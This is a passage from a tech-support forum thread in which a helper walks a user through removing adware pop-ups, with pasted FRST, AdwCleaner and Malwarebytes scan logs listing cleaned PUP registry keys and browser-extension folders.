2014-06-01 16:50 - 2014-05-25 06:48 - 02067456 _____ (Farbar) C:\Users\Hewlett Packard\Desktop\FRST64.exe
2014-06-01 16:42 - 2014-02-03 14:30 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\Dusit Signage Package
2014-06-01 16:41 - 2013-11-25 12:31 - 00000916 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-06-01 16:29 - 2013-05-31 13:28 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-06-01 16:25 - 2009-07-14 13:13 - 00783400 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-06-01 16:23 - 2014-06-01 16:23 - 00086552 _____ () C:\Users\Hewlett Packard\AppData\Local\GDIPFONTCACHEV1.DAT
2014-06-01 16:22 - 2014-05-27 15:38 - 00110706 _____ () C:\Windows\WindowsUpdate.log
2014-06-01 11:45 - 2013-08-14 18:28 - 00000372 _____ () C:\Windows\Tasks\HPCeeScheduleForHewlett Packard.job
2014-06-01 11:41 - 2013-11-25 12:31 - 00000912 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-06-01 09:41 - 2014-01-15 00:02 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\Deployment
2014-06-01 01:58 - 2013-05-13 14:14 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Skype
2014-05-31 21:06 - 2013-12-03 10:18 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\CrashDumps
2014-05-31 17:22 - 2013-05-07 15:41 - 00003990 _____ () C:\Windows\System32\Tasks\User_Feed_Synchronization-{D38877BA-A6DE-4B41-8821-353EF4B824FB}
2014-05-31 01:16 - 2014-05-07 09:22 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\DropboxMaster
2014-05-31 01:16 - 2013-06-04 13:38 - 00000000 ___RD () C:\Users\Hewlett Packard\Dropbox
2014-05-31 01:16 - 2013-06-04 13:30 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Dropbox
2014-05-31 01:02 - 2009-07-14 12:45 - 00032064 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-05-31 01:02 - 2009-07-14 12:45 - 00032064 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-05-31 00:55 - 2009-07-14 13:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-05-28 14:10 - 2014-05-28 14:10 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\NCWC
2014-05-28 11:45 - 2013-08-14 18:28 - 00003246 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForHewlett Packard
2014-05-28 11:45 - 2013-05-08 11:19 - 00000052 _____ () C:\Windows\SysWOW64\DOErrors.log
2014-05-28 11:44 - 2013-06-05 07:48 - 00000000 _____ () C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt
2014-05-28 11:38 - 2013-06-04 13:35 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2014-05-28 11:38 - 2013-05-07 15:41 - 00000000 ___RD () C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-05-27 19:03 - 2014-05-27 19:00 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Google
2014-05-27 19:00 - 2013-11-25 12:31 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\Google
2014-05-27 18:24 - 2014-05-27 18:24 - 00380416 _____ () C:\Users\Hewlett Packard\Downloads\9kx0sxi1.exe
2014-05-27 18:13 - 2014-05-27 18:13 - 00030075 _____ () C:\Users\Hewlett Packard\Downloads\dds.txt
2014-05-27 18:13 - 2014-05-27 18:13 - 00008131 _____ () C:\Users\Hewlett Packard\Downloads\attach.txt
2014-05-27 18:05 - 2014-05-27 18:05 - 00016141 _____ () C:\Users\Hewlett Packard\Downloads\hijackthis.log
2014-05-27 18:02 - 2013-05-07 15:40 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\VirtualStore
2014-05-27 17:59 - 2014-05-27 17:58 - 00688992 ____R (Swearware) C:\Users\Hewlett Packard\Downloads\dds.scr
2014-05-27 17:56 - 2014-05-27 17:56 - 00388608 _____ (Trend Micro Inc.) C:\Users\Hewlett Packard\Downloads\HijackThis.exe
2014-05-27 17:14 - 2009-07-14 11:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-05-27 17:11 - 2014-05-25 07:00 - 00050845 _____ () C:\Users\Hewlett Packard\Downloads\FRST.txt
2014-05-27 17:09 - 2014-05-27 17:09 - 00062571 _____ () C:\Users\Hewlett Packard\Downloads\Shortcut.txt
2014-05-27 17:09 - 2014-05-25 07:01 - 00031358 _____ () C:\Users\Hewlett Packard\Downloads\Addition.txt
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Ralph Walker\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Public\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\hedev\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\dub_cm_auto\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Default\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Default User\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 12:35 - 00000000 ____D () C:\Qoobox
2014-05-27 13:05 - 2014-04-23 09:28 - 00000000 ____D () C:\Users\dub_cm_auto
2014-05-27 13:05 - 2013-12-16 21:26 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\Apps\2.0
2014-05-27 13:05 - 2012-03-03 10:14 - 00000000 ____D () C:\Users\Ralph Walker
2014-05-27 13:04 - 2014-05-27 13:04 - 00033698 _____ () C:\ComboFix.txt
2014-05-27 12:59 - 2014-05-27 12:35 - 00000000 ____D () C:\Windows\erdnt
2014-05-27 12:47 - 2009-07-14 10:34 - 00000215 _____ () C:\Windows\system.ini
2014-05-27 12:28 - 2014-05-27 12:28 - 05200919 ____R (Swearware) C:\Users\Hewlett Packard\Downloads\username123.exe
2014-05-27 12:24 - 2014-05-25 06:57 - 00000000 ____D () C:\AdwCleaner
2014-05-27 12:22 - 2014-05-27 12:22 - 01327971 _____ () C:\Users\Hewlett Packard\Downloads\adwcleaner_3.211.exe
2014-05-27 09:49 - 2014-05-27 09:49 - 00007606 _____ () C:\Users\Hewlett Packard\AppData\Local\Resmon.ResmonCfg
2014-05-27 09:38 - 2014-05-20 23:55 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YTD Video Downloader
2014-05-27 09:38 - 2013-12-30 05:17 - 00000000 ___RD () C:\Users\Hewlett Packard\Desktop\Technical 2014
2014-05-27 09:31 - 2014-05-25 05:44 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\NPE
2014-05-27 09:29 - 2014-05-25 05:46 - 00000000 ____D () C:\NPE
2014-05-27 03:19 - 2013-06-04 13:41 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\Adobe
2014-05-27 00:17 - 2013-05-31 13:28 - 00692400 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-05-27 00:17 - 2013-05-31 13:28 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-05-27 00:17 - 2011-11-10 07:56 - 00070832 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-05-26 23:34 - 2014-05-26 23:34 - 00000632 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233429.reg
2014-05-26 23:34 - 2014-05-26 23:34 - 00000632 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233404.reg
2014-05-26 23:33 - 2014-05-26 23:33 - 00012436 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233313.reg
2014-05-26 23:32 - 2014-05-26 23:31 - 00046014 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233124.reg
2014-05-26 10:07 - 2014-05-25 04:13 - 00003702 _____ () C:\Windows\System32\Tasks\RegWrite
2014-05-26 01:24 - 2013-12-02 03:31 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\vlc
2014-05-25 20:13 - 2014-05-25 20:12 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\SkyCable
2014-05-25 19:15 - 2013-11-27 11:40 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\samsung
2014-05-25 18:58 - 2014-05-25 18:58 - 00001969 _____ () C:\Users\Public\Desktop\Samsung Kies 3.lnk
2014-05-25 18:58 - 2014-05-25 18:58 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\SelfMV
2014-05-25 18:58 - 2013-11-27 11:40 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Samsung
2014-05-25 18:58 - 2013-11-27 11:33 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung
2014-05-25 18:58 - 2013-11-27 11:32 - 00000000 ____D () C:\Program Files (x86)\Samsung
2014-05-25 18:58 - 2011-11-10 08:10 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
2014-05-25 18:47 - 2013-11-27 11:40 - 00002002 _____ () C:\Users\Public\Desktop\Samsung Kies (Lite).lnk
2014-05-25 07:19 - 2014-05-25 07:19 - 00002606 _____ () C:\Users\Hewlett Packard\Downloads\Rkill.txt
2014-05-25 06:55 - 2014-05-25 06:55 - 01940216 _____ (Bleeping Computer, LLC) C:\Users\Hewlett Packard\Downloads\rkill.exe
2014-05-25 06:11 - 2013-05-07 15:40 - 00000000 ____D () C:\Users\Hewlett Packard
2014-05-25 05:45 - 2012-04-06 01:53 - 00000000 ____D () C:\ProgramData\Norton
2014-05-25 05:14 - 2014-05-25 05:14 - 00041926 _____ () C:\Users\Hewlett Packard\Documents\cc_20140525_051401.reg
2014-05-25 03:27 - 2013-12-02 03:31 - 00000258 __RSH () C:\Users\Hewlett Packard\ntuser.pol
2014-05-24 14:55 - 2013-09-23 13:55 - 00000000 ____D () C:\Program Files\CCleaner
2014-05-24 14:02 - 2014-05-24 14:02 - 00001137 _____ () C:\Users\Public\Desktop\Yahoo! Messenger.lnk
2014-05-24 14:02 - 2014-05-24 14:02 - 00000000 ____D () C:\ProgramData\Yahoo! Companion
2014-05-24 14:02 - 2014-05-24 14:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Yahoo! Messenger
2014-05-24 14:02 - 2014-01-04 13:01 - 00000000 ____D () C:\ProgramData\Yahoo!
2014-05-24 14:02 - 2014-01-04 12:57 - 00000000 ____D () C:\Program Files (x86)\Yahoo!
2014-05-24 14:02 - 2013-06-14 19:46 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Yahoo!
2014-05-23 19:22 - 2014-05-23 18:58 - 17917592 _____ () C:\Users\Hewlett Packard\Desktop\Overall Presentation - Retirement.pptx
2014-05-23 19:09 - 2014-05-23 18:57 - 09242974 _____ () C:\Users\Hewlett Packard\Desktop\Overall Presentation - Prospective Properties.pptx
2014-05-23 12:48 - 2013-11-25 12:33 - 00002183 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-05-21 09:06 - 2013-05-07 15:45 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\Youcam
2014-05-21 08:30 - 2014-05-21 08:30 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans
2014-05-20 23:56 - 2013-11-03 11:23 - 00000000 ____D () C:\ProgramData\YTD Video Downloader
2014-05-20 00:56 - 2013-12-30 05:17 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\Personal 2014
2014-05-17 07:15 - 2013-05-07 15:41 - 00000000 ___RD () C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools
2014-05-17 03:31 - 2014-05-07 09:22 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-05-17 03:15 - 2013-05-13 14:23 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-05-17 03:07 - 2013-08-14 18:03 - 00000000 ____D () C:\Windows\system32\MRT
2014-05-17 03:03 - 2013-05-08 11:23 - 93223848 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-05-16 23:20 - 2014-05-16 23:20 - 00000000 ____D () C:\Windows\System32\Tasks\Norton Internet Security
2014-05-16 23:18 - 2014-01-17 11:42 - 00002019 _____ () C:\Users\Public\Desktop\Adobe Reader X.lnk
2014-05-16 23:18 - 2011-11-10 08:07 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk
2014-05-16 23:15 - 2013-11-25 12:17 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Internet Security
2014-05-16 23:15 - 2013-05-07 15:41 - 00002501 _____ () C:\Users\Public\Desktop\Norton Internet Security.lnk
2014-05-16 23:15 - 2012-04-06 01:53 - 00003234 _____ () C:\Windows\System32\Tasks\Norton WSC Integration
2014-05-16 23:15 - 2012-04-06 01:53 - 00000000 ____D () C:\Windows\system32\Drivers\NISx64
2014-05-11 11:36 - 2013-11-25 12:31 - 00003912 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-05-11 11:36 - 2013-11-25 12:31 - 00003660 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-05-09 15:35 - 2014-05-09 15:35 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Oracle
2014-05-09 15:35 - 2014-05-09 15:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-05-09 15:35 - 2013-10-22 10:14 - 00000000 ____D () C:\ProgramData\Oracle
2014-05-09 15:35 - 2013-09-05 18:21 - 00000000 ____D () C:\Program Files (x86)\Java
2014-05-09 14:14 - 2014-05-15 15:04 - 00477184 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-05-09 14:11 - 2014-05-15 15:04 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-05-07 22:56 - 2013-10-09 17:56 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\Aeden
2014-05-06 12:40 - 2014-05-17 03:14 - 23544320 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-05-06 12:17 - 2014-05-17 03:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-05-06 11:25 - 2014-05-17 03:14 - 17382912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-05-06 11:07 - 2014-05-17 03:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-05-06 11:00 - 2014-05-17 03:14 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-05-06 10:10 - 2014-05-17 03:14 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-05-05 16:55 - 2014-05-05 16:55 - 00000031 _____ () C:\Users\Hewlett Packard\Desktop\dvr password.txt
2014-05-05 16:52 - 2014-05-05 16:50 - 00000000 ____D () C:\Program Files (x86)\DVRClient Plug-in
2014-05-05 16:50 - 2014-05-05 16:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DVRClient Plug-in

Some content of TEMP:
====================
C:\Users\Hewlett Packard\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpcicokw.dll

==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit

LastRegBack: 2014-05-29 00:26

==================== End Of Log ============================


----------



## raphael100 (May 24, 2014)

Thanks so much. The remaining pop-ups have gone. It seems IE is also restored.


----------



## emeraldnzl (Nov 3, 2007)

> Thanks so much. The remaining pop-ups have gone. It seems IE is also restored.


Good news, tends to confirm that the fix worked. 

Now to do a bit of cleaning up.

After that a final check before we go to clearing away the tools we have been using.

Please download : *ADWCleaner* to your desktop (use the Download Now @ BleepingComputer button)..

*NOTE:* If using Internet Explorer and get an alert that stops the program downloading, click on the warning and allow the download to complete.

Close all programs and click on the *AdwCleaner* icon.










Click on *Scan* and follow the prompts. Let it run unhindered. When the "Please uncheck elements you don't want to remove" appears just go ahead and click on the *Clean* button, and follow the prompts. Allow the system to reboot. You will then be presented with the report. Copy and paste back here. If a report doesn't appear, press the report button and Copy & Paste the contents on your next reply.

A copy of the report is also saved in the C:\AdwCleaner folder.

*After that*

Please download Malwarebytes Anti-Malware Free from *here* .

Double click to install the progamme
When the popup "Completing the Malwarebytes Anti-Malware Setup Wizard" appears, uncheck the box enable free trial of Malwarebytes Anti-Malware Premium



The MBAM console/dashboard will appear together with an alert to update - click the green button *Update Now*
When update is complete select *Settings* > *Detection and Protection* and make sure the box *Scan for rootkits* its checked (ticked) 


Go back to the Dashboard and click on the green *Scan Now* button.




If threats are detected, click the *Apply Actions* button, MBAM may ask for a reboot. Let it do so.
[img=https://dl.dropboxusercontent.com/u/73555776/MBAMReboot.JPG]


On completion of the scan (or after the reboot) select _View Detailed Log_ (to the right on the light green strip)
Click on the *Export* button and select *Text file* and save to the desktop
[img=https://dl.dropboxusercontent.com/u/73555776/MBAMLog.JPG]

Copy and paste the log back here.

*So when you return please post
AdwClearner log
MBAM log
*


----------



## raphael100 (May 24, 2014)

Herewith the AdwCleaner Log - Unfortunately, after I turned on the computer this morning one of the blank pop-ups returned. I attach a snipped image of that. It is still popping up now.

# AdwCleaner v3.211 - Report created 02/06/2014 at 08:19:23
# Updated 26/05/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Hewlett Packard - HEWLETTPACKARD
# Running from : C:\Users\Hewlett Packard\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

***** [ Files / Folders ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

Key Deleted : HKCU\Software\AppDataLow\Software

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17041

-\\ Google Chrome v35.0.1916.114

[ File : C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\preferences ]

*************************

AdwCleaner[R0].txt - [8519 octets] - [25/05/2014 06:57:17]
AdwCleaner[R1].txt - [8579 octets] - [25/05/2014 07:10:27]
AdwCleaner[R2].txt - [1111 octets] - [25/05/2014 07:17:06]
AdwCleaner[R3].txt - [1171 octets] - [25/05/2014 07:21:58]
AdwCleaner[R4].txt - [2265 octets] - [27/05/2014 12:23:15]
AdwCleaner[R5].txt - [1266 octets] - [02/06/2014 08:18:52]
AdwCleaner[S0].txt - [8155 octets] - [25/05/2014 07:10:54]
AdwCleaner[S1].txt - [2310 octets] - [27/05/2014 12:23:57]
AdwCleaner[S2].txt - [1189 octets] - [02/06/2014 08:19:23]

########## EOF - C:\AdwCleaner\AdwCleaner[S2].txt - [1249 octets] ##########


----------



## raphael100 (May 24, 2014)

Attached an image of the remaining pop-up. Originally there were 2 of these blank pop-ups. The Japanese one with images disappeared after the first day. The remaining 2 were blank with some http:// text in the top left corner.

Thanks.


----------



## raphael100 (May 24, 2014)

Herewith the MBAM log. I could not find the 'View Detailed Log' key with export facility that you mentioned after reboot. I did notice it before reboot but did not operate it. In any case I have located the log ('Settings' then 'History Settings') in xml and have copied it here:

(Please note the remaining pop-up is still active at this point)

<?xml version="1.0" encoding="UTF-16"?>

-<mbam-log>

-

<date>2014/06/02 08:38:56 +0800</date>

<logfile>mbam-log-2014-06-02 (08-38-53).xml</logfile>

<isadmin>yes</isadmin>

-<engine>

<version>2.00.2.1012</version>

<malware-database>v2014.06.01.10</malware-database>

<rootkit-database>v2014.05.21.01</rootkit-database>

<license>free</license>

<file-protection>disabled</file-protection>

<web-protection>disabled</web-protection>

<self-protection>disabled</self-protection>

</engine>

-<system>

<osversion>Windows 7 Service Pack 1</osversion>

<arch>x64</arch>

<username>Hewlett Packard</username>

<filesys>NTFS</filesys>

</system>

-

<type>threat</type>

<result>completed</result>

<objects>316553</objects>

465

<processes>0</processes>

<modules>0</modules>

<keys>8</keys>

<values>0</values>

<datas>0</datas>

<folders>9</folders>

<files>61</files>

<sectors>0</sectors>

-<options>

<memory>enabled</memory>

<startup>enabled</startup>

<filesystem>enabled</filesystem>

<archives>enabled</archives>

<rootkits>enabled</rootkits>

<deeprootkit>disabled</deeprootkit>

<heuristics>enabled</heuristics>

<pup>enabled</pup>

<pum>enabled</pum>

</options>

-<items>

-<key>

<path>HKU\S-1-5-21-507872264-2459020571-1386800278-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{7F6AFBF1-E065-4627-A2FD-810366367D01}</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>7699d1831e5d9e98ee62c372f909bd43</hash>

</key>

-<key>

<path>HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{B2D33ED6-EBBD-467C-BF6F-F175D9B51363}</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>000f094b126945f13ee5999ca161ea16</hash>

</key>

-<key>

<path>HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{BAD84EE2-624D-4e7c-A8BB-41EFD720FD77}</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e02fe86c9be03501f62ea3922ed4a060</hash>

</key>

-<key>

<path>HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{cc28794a-99d4-4b1b-bccf-b065ce5f9feb}</path>

<vendor>PUP.Optional.MindSpark.A</vendor>

<action>success</action>

<hash>eb242b29f586c670427298993dc5cb35</hash>

</key>

-<key>

<path>HKLM\SOFTWARE\WOW6432NODE\InternetSpeedTracker_9t</path>

<vendor>PUP.Optional.MindSpark.A</vendor>

<action>success</action>

<hash>030c262e740734021cb826b8b84bcc34</hash>

</key>

-<key>

<path>HKLM\SOFTWARE\WOW6432NODE\MOZILLAPLUGINS\@InternetSpeedTracker_9t.com/Plugin</path>

<vendor>PUP.Optional.MindSpark.A</vendor>

<action>success</action>

<hash>10ff83d1d0ab082e4561afe8659dca36</hash>

</key>

-<key>

<path>HKU\S-1-5-18-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\DefaultTab</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>cc43ed67d9a244f25746248c3dc541bf</hash>

</key>

-<key>

<path>HKU\S-1-5-21-507872264-2459020571-1386800278-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\InternetSpeedTracker_9t</path>

<vendor>PUP.Optional.MindSpark.A</vendor>

<action>success</action>

<hash>bd52e47048333204bd18c717ab58bf41</hash>

</key>

-<folder>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</folder>

-<folder>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</folder>

-<folder>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\css</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</folder>

-<folder>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\css\jquery_ui</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</folder>

-<folder>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\css\jquery_ui\images</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</folder>

-<folder>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</folder>

-<folder>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\engines_icons</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</folder>

-<folder>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</folder>

-<folder>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\js</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</folder>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\18x18.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\background.html</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\blank.html</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\manifest.json</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\manifest_no_button.json</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\new_tab.html</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\search_box.html</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\css\injection.css</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\css\jquery_ui\jquery-ui-1.8.16.custom.css</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

